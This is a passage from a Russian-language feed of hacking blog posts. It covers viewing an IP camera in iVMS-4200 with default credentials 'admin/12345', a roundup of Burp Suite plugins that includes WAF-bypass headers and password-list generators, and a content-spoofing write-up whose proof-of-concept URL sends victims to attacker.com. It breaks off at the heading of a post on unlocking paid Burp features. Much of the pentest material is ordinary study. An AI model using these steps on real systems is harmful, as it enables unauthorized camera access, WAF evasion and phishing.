  &lt;p id=&quot;EGL4&quot;&gt;Логин от камеры — (2)&lt;/p&gt;
  &lt;p id=&quot;mPku&quot;&gt;Пароль от камеры — (3)&lt;/p&gt;
  &lt;p id=&quot;ILZI&quot;&gt;Запускаем программу iVMS-4200&lt;/p&gt;
  &lt;p id=&quot;cs1c&quot;&gt;Нажимаем Device Management&lt;/p&gt;
  &lt;p id=&quot;Vm4D&quot;&gt;Нажимаем кнопку «Add»&lt;/p&gt;
  &lt;p id=&quot;Cx8K&quot;&gt;В поле «Nickname» — вводим любое называние&lt;/p&gt;
  &lt;p id=&quot;3HPq&quot;&gt;В поле «Adress» -вводим IP адрес камеры&lt;/p&gt;
  &lt;p id=&quot;FNLe&quot;&gt;В поле «Login» — вводим Логин камеры (admin)&lt;/p&gt;
  &lt;p id=&quot;dQVL&quot;&gt;В поле «Password» — вводим Папроль камеры (12345)&lt;/p&gt;
  &lt;p id=&quot;6zjl&quot;&gt;И нажимаем кнопку «Add»:&lt;/p&gt;
  &lt;figure id=&quot;S0WS&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/f8259f35464d8037acc86.jpg&quot; width=&quot;648&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;nfuM&quot;&gt;Вверху нажимаем Control Panel и переходим в Main View.&lt;/p&gt;
  &lt;p id=&quot;3iL8&quot;&gt;В панели «Camera» у вас появится камера. Дважды нажимаете по ней, и вы будете просматривать данную камеру!&lt;/p&gt;
  &lt;figure id=&quot;oadY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://cryptoworld.su/wp-content/uploads/2017/10/896fdc52d984116499c6e.jpg&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Fmvv&quot;&gt;Также вам могут оставить послание как на скриншоте.&lt;/p&gt;

</content></entry><entry><id>rytnux:Ytt3RTugnqu</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/Ytt3RTugnqu?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>TOP 10 Burp Suite Plugins</title><published>2022-04-06T19:27:55.864Z</published><updated>2022-04-06T19:27:55.864Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/f0/6a/f06ada2e-0265-4048-b7df-7469cc797524.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/4a/52/4a527f9d-a01b-419c-b1ed-c2d7783ea9f7.png&quot;&gt;ИСТОЧНИК =&gt; https://protey.net/threads/top-10-burp-suite-plugins.278/</summary><content type="html">
  &lt;p id=&quot;l873&quot;&gt;&lt;strong&gt;ИСТОЧНИК =&amp;gt; &lt;a href=&quot;https://protey.net/threads/top-10-burp-suite-plugins.278/&quot; target=&quot;_blank&quot;&gt;https://protey.net/threads/top-10-burp-suite-plugins.278/&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
  &lt;figure id=&quot;8lGG&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4a/52/4a527f9d-a01b-419c-b1ed-c2d7783ea9f7.png&quot; width=&quot;1280&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;QfrL&quot;&gt;Функционала Burp Suite Professional, по умолчанию, может показаться достаточно, но если есть вариант что-то улучшить, то нужно этим пользоваться.&lt;/p&gt;
  &lt;p id=&quot;0qOH&quot;&gt;Как раз таким вариантом, в нашем случае будут плагины, ниже я сформировал топ 10 полезных расширений, которыми я пользуюсь в повседневности.&lt;/p&gt;
  &lt;p id=&quot;SqWz&quot;&gt;&lt;strong&gt;Upload Scanner&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;I1aw&quot;&gt;Веб-приложения, позволяющие пользователям загружать свои собственные файлы, являются классическим поводом для беспокойства при тестировании на проникновение. Если пользователям разрешено загружать файлы рискованным способом, существует множество методов это использовать. Это также означает, что для оценки функций загрузки файлов может потребоваться некоторое время - время, которое большинство пентестеров не тратит впустую.&lt;/p&gt;
  &lt;p id=&quot;lZvo&quot;&gt;Upload Scanner - это инструмент для тестирования, который может сэкономить вам много времени. Он имеет возможность загружать файлы разных типов, с различными формами полезной нагрузки. Upload Scanner может проверять наличие уязвимостей, включая подделку запросов на стороне сервера (SSRF) и внедрение внешнего объекта XML (XXE), используя в качестве векторов общие типы файлов, такие как JPEG, PDF и MP4.&lt;/p&gt;
  &lt;figure id=&quot;nW1v&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588087110031-png.1455/&quot; width=&quot;876&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5Ow0&quot;&gt;&lt;strong&gt;Param Miner&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;bb5Z&quot;&gt;Param Miner позволяет легко найти потенциальные векторы для атаки отравления веб-кэша. Он способен угадать до 65 000 имен параметров на запрос. И это было написано исследователем, который доказал, что отравление веб-кэша - это больше, чем просто теоретическая проблема.&lt;/p&gt;
  &lt;figure id=&quot;TJ1l&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588087174810-png.1456/&quot; width=&quot;855&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;6QEK&quot;&gt;&lt;strong&gt;ActiveScan ++&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;J9eb&quot;&gt;ActiveScan ++&lt;strong&gt; - &lt;/strong&gt;расширяет возможности активного и пассивного сканирования Burp Suite. Разработанный для добавления минимальных сетевых издержек, он определяет поведение приложения, которое может представлять интерес для опытных тестировщиков:&lt;/p&gt;
  &lt;ul id=&quot;yKYr&quot;&gt;
    &lt;li id=&quot;gtXP&quot;&gt;Потенциальные атаки на заголовок хоста (отравление сброса пароля, отравление кэша, перепривязка DNS)&lt;/li&gt;
    &lt;li id=&quot;BQfy&quot;&gt;Edge Side Include Injection&lt;/li&gt;
    &lt;li id=&quot;2lWC&quot;&gt;Обработка ввода XML&lt;/li&gt;
    &lt;li id=&quot;QEAq&quot;&gt;Подозрительное преобразование ввода (eg 7*7 =&amp;gt; &amp;#x27;49&amp;#x27;, \x41\x41 =&amp;gt; &amp;#x27;AA&amp;#x27;)&lt;/li&gt;
    &lt;li id=&quot;NsJh&quot;&gt;Проблемы с пассивным сканером, возникающие только во время фаззинга (для максимальной эффективности установите расширение «Error Message Checks»)&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;KDiM&quot;&gt;Также добавлены проверки для следующих проблем:&lt;/p&gt;
  &lt;ul id=&quot;iwSz&quot;&gt;
    &lt;li id=&quot;4IDR&quot;&gt;Слепое внедрение кода через язык выражений, Ruby&amp;#x27;s open () и Perl&amp;#x27;s open ()&lt;/li&gt;
    &lt;li id=&quot;1kQE&quot;&gt;CVE-2014-6271/CVE-2014-6278 &amp;#x27;Shellshock&amp;#x27; и CVE-2015-2080, CVE-2017-5638, CVE-2017-12629, CVE-2018-11776&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;4mvu&quot;&gt;Он также предоставляет точки вставки для базовой аутентификации HTTP.&lt;/p&gt;
  &lt;p id=&quot;kdZt&quot;&gt;Чтобы вызвать эти проверки, просто запустите обычное активное сканирование.&lt;/p&gt;
  &lt;p id=&quot;MWI9&quot;&gt;Заголовок узла проверяет подделку заголовка узла, что может привести к тому, что запросы будут направлены в разные приложения на одном и том же узле. Соблюдайте осторожность при работе этого сканера с приложениями в среде общего хостинга.&lt;/p&gt;
  &lt;p id=&quot;rrj7&quot;&gt;Для этого расширения требуется автономная версия Burp Suite Professional версии 1.6 или новее и Jython 2.5 или новее.&lt;/p&gt;
  &lt;figure id=&quot;qYvK&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588087424956-png.1457/&quot; width=&quot;844&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;61XZ&quot;&gt;​&lt;strong&gt;Logger ++&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;ubVD&quot;&gt;Logger ++ - это многопоточное расширение для журналирования Burp Suite. В дополнение к регистрации запросов и ответов от всех инструментов Burp Suite, расширение позволяет определять расширенные фильтры, чтобы выделить интересные записи или журналы фильтра только для тех, которые соответствуют фильтру.&lt;/p&gt;
  &lt;p id=&quot;oH3u&quot;&gt;Встроенный инструмент grep позволяет искать в журналах, чтобы найти записи, которые соответствуют заданному шаблону, и извлечь значения групп захвата.&lt;/p&gt;
  &lt;p id=&quot;nDKP&quot;&gt;Чтобы разрешить использование журналов в других системах, таблицу также можно загрузить в Elasticsearch или экспортировать в CSV.&lt;/p&gt;
  &lt;figure id=&quot;RjqH&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588089065866-png.1458/&quot; width=&quot;1366&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;qW4T&quot;&gt;&lt;strong&gt;Software Vulnerability Scanner&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;eLjv&quot;&gt;Это расширение сканирует на наличие уязвимостей в обнаруженных версиях программного обеспечения с помощью API Vulners.com.&lt;/p&gt;
  &lt;p id=&quot;EcuS&quot;&gt;Он имеет две основные функции:&lt;/p&gt;
  &lt;ul id=&quot;7cYn&quot;&gt;
    &lt;li id=&quot;PUEF&quot;&gt;Обнаружение уязвимого программного обеспечения по отпечаткам или CPE.&lt;/li&gt;
    &lt;li id=&quot;xRA3&quot;&gt;Обнаружение возможных уязвимых путей, на присутствие публичных эксплойтов.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;lioC&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588089552446-png.1459/&quot; width=&quot;701&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vEVC&quot;&gt;&lt;strong&gt;CO2&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;d01F&quot;&gt;Это расширение содержит различные модули для улучшения возможностей Burp.&lt;/p&gt;
  &lt;p id=&quot;kHMP&quot;&gt;Расширение имеет собственную вкладку конфигурации с вложенными вкладками для каждого модуля Co2. Модули, которые взаимодействуют с другими инструментами Burp, можно отключить на вкладке конфигурации Co2, поэтому нет необходимости отключать все расширение при использовании только части функциональности.&lt;/p&gt;
  &lt;p id=&quot;V0Wt&quot;&gt;O2 включает в себя следующие модули:&lt;/p&gt;
  &lt;ul id=&quot;pyCk&quot;&gt;
    &lt;li id=&quot;Y3N7&quot;&gt;SQLMapper, помощник sqlmap. Просто щелкните правой кнопкой мыши по любому запросу в Burp, и вы увидите новую опцию меню для отправки запроса в SQLMapper. Появится экран SQLMapper, предварительно заполненный URL-адресом, данными POST (если применимо) и файлами cookie (если применимо) из запроса. Затем вы можете установить любые другие параметры, которые вам нужны, а затем скопировать / вставить команду в SQLMap в командной строке.&lt;/li&gt;
    &lt;li id=&quot;JwZL&quot;&gt;User Generator - для этого собраны общедоступные данные переписей с &lt;a href=&quot;http://www.census.gov/genealogy/www/data/2000surnames/&quot; target=&quot;_blank&quot;&gt;http://www.census.gov/genealogy/www/data/2000surnames/&lt;/a&gt; (для фамилий) и популярные имена детей с веб-сайта социального обеспечения (&lt;a href=&quot;http://www/&quot; target=&quot;_blank&quot;&gt;http://www&lt;/a&gt; .ssa.gov/OACT/babynames /) для того, чтобы создать генератор имен пользователей на основе этих статистических данных. Интерфейс позволяет немного поработать с наборами данных, указать, хотите ли вы указать полные имена, инициалы, разделитель между именами и фамилиями и т. д. Инструмент определит, какие комбинации имен являются наиболее распространенными, и соответствующим образом отсортирует список. Набор результатов в настоящее время ограничен 200 000 имен, чтобы избежать проблем с производительностью.&lt;/li&gt;
    &lt;li id=&quot;PDKr&quot;&gt;Name Mangler - учитывая некоторые имена и домены, он будет манипулировать ими, создавая список потенциальных имен пользователей, которые можно отправить в Intruder для проверки входа в систему.&lt;/li&gt;
    &lt;li id=&quot;ybq2&quot;&gt;CeWLer - эта версия, основанная на сценарии командной строки Digininja CeWL для извлечения списка слов из файлов HTML, работает со списком ответов непосредственно внутри Burp.&lt;/li&gt;
    &lt;li id=&quot;kg86&quot;&gt;Masher - Учитывая начальный список слов и спецификацию пароля, этот инструмент создаст нечеткий список возможных паролей. Masher начнет с объединения слов из предоставленного списка, затем добавит и заменит символы для создания новых паролей.&lt;/li&gt;
    &lt;li id=&quot;Gkuk&quot;&gt;BasicAuther - учитывая список имен пользователей и список паролей, он покажет корректные строки BasicAuth, которые затем можно будет перетащить в Intruder.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;fkwE&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588090426015-png.1460/&quot; width=&quot;1240&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FmcC&quot;&gt;&lt;strong&gt;WAFDetect&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;uLbL&quot;&gt;Это расширение пассивно обнаруживает присутствие брандмауэра веб-приложения (WAF) по ответам HTTP.&lt;/p&gt;
  &lt;figure id=&quot;5BBq&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/59e395af93092095133873-png.1461/&quot; width=&quot;1608&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;W4FN&quot;&gt;&lt;strong&gt;Bypass WAF&lt;/strong&gt;&lt;br /&gt;​&lt;/p&gt;
  &lt;p id=&quot;pe7P&quot;&gt;Это расширение добавляет заголовки ко всем запросам Burp, чтобы обойти некоторые продукты WAF. Следующие заголовки автоматически добавляются ко всем запросам:&lt;/p&gt;
  &lt;p id=&quot;3rKB&quot;&gt;Код:&lt;/p&gt;
  &lt;pre data-lang=&quot;&quot; id=&quot;OC63&quot;&gt;X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1&lt;/pre&gt;
  &lt;p id=&quot;2Mia&quot;&gt;Применение:&lt;/p&gt;
  &lt;ul id=&quot;tKIo&quot;&gt;
    &lt;li id=&quot;qvuV&quot;&gt;Создайте правило обработки сеанса в Burp, которое вызывает это расширение.&lt;/li&gt;
    &lt;li id=&quot;Z0se&quot;&gt;Измените область, чтобы включить соответствующие инструменты и URL-адреса&lt;/li&gt;
    &lt;li id=&quot;npp1&quot;&gt;Настройте параметры обхода на вкладке «Обход WAF»&lt;/li&gt;
    &lt;li id=&quot;3Ym2&quot;&gt;Можно тестировать&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;Bjm8&quot;&gt;Обход WAF содержит следующие функции:&lt;/p&gt;
  &lt;ul id=&quot;sQhn&quot;&gt;
    &lt;li id=&quot;ryrd&quot;&gt;Пользователи могут изменять заголовки X-Originating-IP, X-Forwarded-For, X-Remote-IP, X-Remote-Addr, отправленные в каждом запросе. Это, вероятно, лучший метод обхода инструмента. Нередко WAF настраивается на доверие к себе (127.0.0.1) или вышестоящему прокси-устройству, на что нацелен этот обход.&lt;/li&gt;
    &lt;li id=&quot;4cBs&quot;&gt;Заголовок «Content-Type» может оставаться неизменным в каждом запросе, удаляться из всех запросов или изменяться для одного из множества других параметров для каждого запроса. Некоторые WAF будут декодировать / оценивать запросы только на основе известных типов контента, эта функция нацелена на эту слабость.&lt;/li&gt;
    &lt;li id=&quot;LA9J&quot;&gt;Заголовок «Host» также может быть изменен. Плохо настроенные WAF могут быть настроены на оценку запросов только на основе правильного полного доменного имени хоста, указанного в этом заголовке, что и является целью обхода.&lt;/li&gt;
    &lt;li id=&quot;HLtq&quot;&gt;Опция типа запроса позволяет пользователю Burp использовать оставшиеся методы обхода только для данного метода запроса «GET» или «POST» или применять их ко всем запросам.&lt;/li&gt;
    &lt;li id=&quot;q0FK&quot;&gt;Функция внедрения пути может оставить запрос неизмененным, добавить информацию о случайном пути (/path/to/example.php/randomvalue?restofquery) или добавить параметр случайного пути (/path/to/example.php;randomparam=randomvalue? resetofquery). Это может использоваться, чтобы обойти плохо написанные правила, которые полагаются на информацию о пути.&lt;/li&gt;
    &lt;li id=&quot;NmJQ&quot;&gt;Функция обфускации пути изменяет последнюю косую черту в пути на случайное значение или по умолчанию ничего не делает. Последняя косая черта может быть изменена на одно из многих значений, которое во многих случаях приводит к все еще действительному запросу, но может обойти плохо написанные правила WAF, которые полагаются на информацию о пути.&lt;/li&gt;
    &lt;li id=&quot;1jED&quot;&gt;Функция обфускации параметров зависит от языка. PHP отбрасывает + в начале каждого параметра, но плохо написанное правило WAF может быть написано для конкретных имен параметров, таким образом игнорируя параметры с + в начале. Точно так же ASP сбрасывает% в начале каждого параметра.&lt;/li&gt;
    &lt;li id=&quot;53fP&quot;&gt;Кнопка «Set Configuration» активирует все выбранные вами настройки.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;36ql&quot;&gt;Все эти функции могут быть объединены для обеспечения нескольких вариантов обхода.&lt;/p&gt;
  &lt;figure id=&quot;8A5o&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588091919302-png.1462/&quot; width=&quot;1443&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;b3xy&quot;&gt;​&lt;strong&gt;Backslash powered scanner&lt;/strong&gt;&lt;br /&gt;​&lt;/p&gt;
  &lt;p id=&quot;L6d9&quot;&gt;Это расширение дополняет активный сканер Burp, используя новый подход, способный находить и подтверждать как известные, так и неизвестные классы уязвимостей внедрения на стороне сервера. Разработанный на основе классических ручных методов, этот подход использует многие преимущества ручного тестирования, включая случайное уклонение от WAF, незначительное использование сети и гибкость при фильтрации входных данных.&lt;/p&gt;
  &lt;figure id=&quot;vAlO&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588093951822-png.1463/&quot; width=&quot;963&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5VfW&quot;&gt;​&lt;strong&gt;HTTP Request Smuggler&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;sqWJ&quot;&gt;Это расширение для Burp Suite, разработанное, чтобы помочь вам запускать атаки HTTP Request Smuggling, первоначально созданные во время исследования HTTP Desync Attacks. Он поддерживает сканирование на наличие уязвимостей, связанных с Request Smuggling, а также помогает в эксплуатации, выполняя для вас громоздкую настройку смещения.&lt;/p&gt;
  &lt;p id=&quot;qXoj&quot;&gt;Это расширение не следует путать с Burp Suite HTTP Smuggler, который использует аналогичные методы, но сфокусирован исключительно на WAF.&lt;/p&gt;
  &lt;figure id=&quot;L2g9&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://protey.net/attachments/1588094315309-png.1464/&quot; width=&quot;1034&quot; /&gt;
  &lt;/figure&gt;

</content></entry><entry><id>rytnux:qK8UIvG9Y1U</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/qK8UIvG9Y1U?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>Text Based Injection | Content Spoofing</title><published>2022-03-28T06:31:39.760Z</published><updated>2022-03-28T06:31:39.760Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/4c/92/4c926a38-603c-493e-8762-fbb322f95405.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img3.teletype.in/files/68/ec/68ec037e-f8ae-4053-a682-3fb195ad1f92.png&quot;&gt;Внедрение на основе текста. Внедрение текста или внедрение на основе текста (TBI) — это внедрение, при котором пользовательский ввод отражается так же, как и в ответе приложения, в виде открытого текста. Это один из способов подмены контента, также называемый внедрением контента или виртуальным искажением, который можно использовать в фишинговых атаках.</summary><content type="html">
  &lt;figure id=&quot;NK1o&quot; class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/68/ec/68ec037e-f8ae-4053-a682-3fb195ad1f92.png&quot; width=&quot;960&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;HgfU&quot;&gt;&lt;strong&gt;Внедрение на основе текста.&lt;/strong&gt; Внедрение текста или внедрение на основе текста (TBI) — это внедрение, при котором пользовательский ввод отражается так же, как и в ответе приложения, в виде открытого текста. Это один из способов подмены контента, также называемый внедрением контента или виртуальным искажением, который можно использовать в фишинговых атаках.&lt;/p&gt;
  &lt;p id=&quot;4c26&quot;&gt;Приложение уязвимо для внедрения текста, если оно неправильно обрабатывает предоставленные пользователем данные. Злоумышленник может предоставить контент веб-приложению, как правило, через значение параметра или только из URL-адреса, который отражается обратно пользователю. Пользователю будет представлена ​​измененная страница в контексте доверенного домена.&lt;/p&gt;
  &lt;p id=&quot;e3b8&quot;&gt;&lt;strong&gt;Тип атаки:&lt;/strong&gt; уязвимость на стороне клиента&lt;/p&gt;
  &lt;p id=&quot;7fe7&quot;&gt;&lt;strong&gt;Серьезность:&lt;/strong&gt; низкая&lt;/p&gt;
  &lt;h2 id=&quot;3aaf&quot;&gt;Руководство по аудиту&lt;/h2&gt;
  &lt;p id=&quot;1c29&quot;&gt;Внедрение текста можно легко найти там, где&lt;/p&gt;
  &lt;ol id=&quot;HTc6&quot;&gt;
    &lt;li id=&quot;e224&quot;&gt;Ввод пользователя через параметр или непосредственно в URL отражается в ответе страницы..&lt;/li&gt;
    &lt;li id=&quot;3575&quot;&gt;Content-Type: текстовый/обычный&lt;/li&gt;
    &lt;li id=&quot;8e2d&quot;&gt;Приложение выдает страницы ошибок по умолчанию&lt;/li&gt;
  &lt;/ol&gt;
  &lt;h2 id=&quot;cbdc&quot;&gt;Доказательство концепции&lt;/h2&gt;
  &lt;p id=&quot;dbc3&quot;&gt;Если вы исследуете немного больше, чтобы понять, почему это происходит и в чем здесь проблема. Вы получите ответ на вопрос «в чем проблема», что приложение выдает страницу ошибки по умолчанию.&lt;/p&gt;
  &lt;p id=&quot;f5b9&quot;&gt;На вопрос «почему это происходит» мы знаем ответ, верно?&lt;/p&gt;
  &lt;p id=&quot;e4fb&quot;&gt;В любом случае, ответ, вводимый пользователем через параметр или непосредственно в URL-адресе, отражается в ответе страницы.&lt;/p&gt;
  &lt;p id=&quot;a8f1&quot;&gt;&lt;strong&gt;Страница ошибки&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;1404&quot;&gt;URL - &lt;a href=&quot;https://example.com/captcha&quot; target=&quot;_blank&quot;&gt;https://example.com/captcha&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;T4do&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://miro.medium.com/max/1400/1*zZQJ44OgTLd80IY1WIZ0pQ.png&quot; width=&quot;700&quot; /&gt;
    &lt;figcaption&gt;Страница ошибки&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;d325&quot;&gt;&lt;strong&gt;Изменена страница ошибки&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;488f&quot;&gt;URL-адрес: &lt;a href=&quot;https://example.com/captcha/SS%2F%20%20%20is%20not%20available.%20Please%20visit%20-%20-%20-%20-%20https://attacker.com%20%20-%20-%20-%20-%20as%20resource%20&quot; target=&quot;_blank&quot;&gt;https://example.com/captcha/SS%2F%20%20%20is%20not%20available.%20Please%20visit%20-%20-%20-%20-%20https://attacker.com %20%20-%20-%20-%20-%20ас%20ресурс%20&lt;/a&gt;&lt;/p&gt;
  &lt;figure id=&quot;x4rq&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://miro.medium.com/max/1400/1*jYzsNWlw4T5-_VzwQIe7Zg.png&quot; width=&quot;700&quot; /&gt;
    &lt;figcaption&gt;Изменена страница ошибки&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;f676&quot;&gt;&lt;strong&gt;Как это делает Google&lt;/strong&gt;&lt;/p&gt;
  &lt;p id=&quot;5991&quot;&gt;Google очень хорошо обрабатывает страницы ошибок. Вот скриншот для справки.&lt;/p&gt;
  &lt;figure id=&quot;QKAd&quot; class=&quot;m_custom&quot;&gt;
    &lt;img src=&quot;https://miro.medium.com/max/1400/1*DtOp4alR0aEt6TnxFnMk7A.png&quot; width=&quot;700&quot; /&gt;
    &lt;figcaption&gt;Хорошая обработка пользовательского ввода в URL-адресе Google&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h2 id=&quot;8845&quot;&gt;Влияние&lt;/h2&gt;
  &lt;p id=&quot;63ac&quot;&gt;Злоумышленник может использовать уязвимость внедрения текста, чтобы представить настроенное сообщение в приложении, которое может заставить пользователей поверить в подлинность сообщения. Намерение типично для жертв, хотя иногда фактическая цель может заключаться в том, чтобы просто представить в ложном свете организацию или человека. Эта атака обычно используется как социальная инженерия или в сочетании с ней, поскольку атака использует уязвимость в коде и доверие пользователя. В качестве примечания, эта атака широко ошибочно понимается как своего рода ошибка, которая не оказывает никакого влияния.&lt;/p&gt;
  &lt;h2 id=&quot;0558&quot;&gt;Рекомендации&lt;/h2&gt;
  &lt;p id=&quot;17ab&quot;&gt;Приложение должно принимать только те значения и типы, которые определены для параметров, и должно проверяться на стороне сервера на наличие измененного содержимого, если есть изменение, то приложение должно отклонить этот запрос. Кроме того, никогда не создавайте и не отправляйте сообщения через URL-адрес в ответе страницы. Предпочтительнее использовать сообщения, предварительно определенные в файле свойств.&lt;/p&gt;
  &lt;p id=&quot;eb49&quot;&gt;Для страниц ошибок по умолчанию&lt;/p&gt;
  &lt;p id=&quot;c5b6&quot;&gt;В конфигурации приложения должна быть указана страница ошибок по умолчанию, чтобы гарантировать, что приложение никогда не передаст сообщения об ошибках злоумышленнику. Обработка стандартных кодов ошибок HTTP удобна для пользователя в дополнение к хорошей практике безопасности и может быть выполнена путем указания пользовательских страниц ошибок для таких кодов ошибок, как 404, 403, 500 и т. д.&lt;/p&gt;

</content></entry><entry><id>rytnux:ziYIMpieEiO</id><link rel="alternate" type="text/html" href="https://teletype.in/@rytnux/ziYIMpieEiO?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=rytnux"></link><title>CSRF poc generator и burp collaborator бесплатно</title><published>2022-03-19T18:10:07.630Z</published><updated>2022-03-19T18:10:07.630Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img1.teletype.in/files/ca/ad/caad8738-2646-44ed-8c60-65c5688193a1.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://filecr.com/wp-content/uploads/2020/01/Burp-Suite-Professional-2020-Free-Download.jpg&quot;&gt;Если вы бедный, как и админ канала t.me/termuxqew, но хотите разблокирорвать две платные функции в burp suite, то я вам покажу как это сделать! =)</summary><content type="html">
  &lt;figure id=&quot;dkjX&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://filecr.com/wp-content/uploads/2020/01/Burp-Suite-Professional-2020-Free-Download.jpg&quot; width=&quot;836&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;aZSO&quot;&gt;Если вы бедный, как и админ канала t.me/termuxqew, но хотите разблокирорвать две платные функции в burp suite, то я вам покажу как это сделать! =)&lt;/p&gt;
  &lt;h2 id=&quot;qqJs&quot;&gt;CSRF poc generator&lt;/h2&gt;
  &lt;p id=&quot;MceA&quot;&gt;Сперва разблокируем CSRF poc generator. (&lt;a href=&quot;https://github.com/merttasci/csrf-poc-generator&quot; target=&quot;_blank&quot;&gt;github.com/merttasci/csrf-poc-generator&lt;/a&gt;)&lt;/p&gt;
  &lt;p id=&quot;R5nN&quot;&gt;Для этого скачиваем с гитхаба архив и извлекаем&lt;/p&gt;
  &lt;figure id=&quot;y1nn&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/86/f1/86f1798c-7ae2-4556-a825-70d770892b14.png&quot; width=&quot;1110&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;p9nT&quot;&gt;После переходим через cmd в папку с репо и пишем &lt;/p&gt;
  &lt;p id=&quot;IgdT&quot;&gt;&lt;em&gt;python - m http.server &lt;/em&gt;&lt;/p&gt;
  &lt;p id=&quot;igvy&quot;&gt;Если на линукс, то проще будет написать &lt;/p&gt;
  &lt;p id=&quot;A61K&quot;&gt;&lt;em&gt;php -S localhost:порт&lt;/em&gt;&lt;/p&gt;
  &lt;figure id=&quot;L9HF&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b3/d3/b3d3beb7-85d2-4f6e-914f-41974a59a4c3.png&quot; width=&quot;800&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;zMuw&quot;&gt;После переходим на localhost:8000 и видим утилиту!&lt;/p&gt;
  &lt;p id=&quot;sk2h&quot;&gt;&lt;/p&gt;
  &lt;figure id=&quot;nCwn&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bd/ac/bdac9a74-4c09-4807-9b8d-17460e136a24.png&quot; width=&quot;1880&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;hKzX&quot;&gt;После этого просто используем по назначению&lt;/p&gt;
  &lt;figure id=&quot;ehHp&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/aa/ac/aaacc2c5-c779-4e7c-8c8a-21a70c313f3e.png&quot; width=&quot;1719&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Dp0E&quot;&gt;Профит! ;)&lt;/p&gt;
  &lt;h2 id=&quot;U90n&quot;&gt;burp collaborator&lt;/h2&gt;
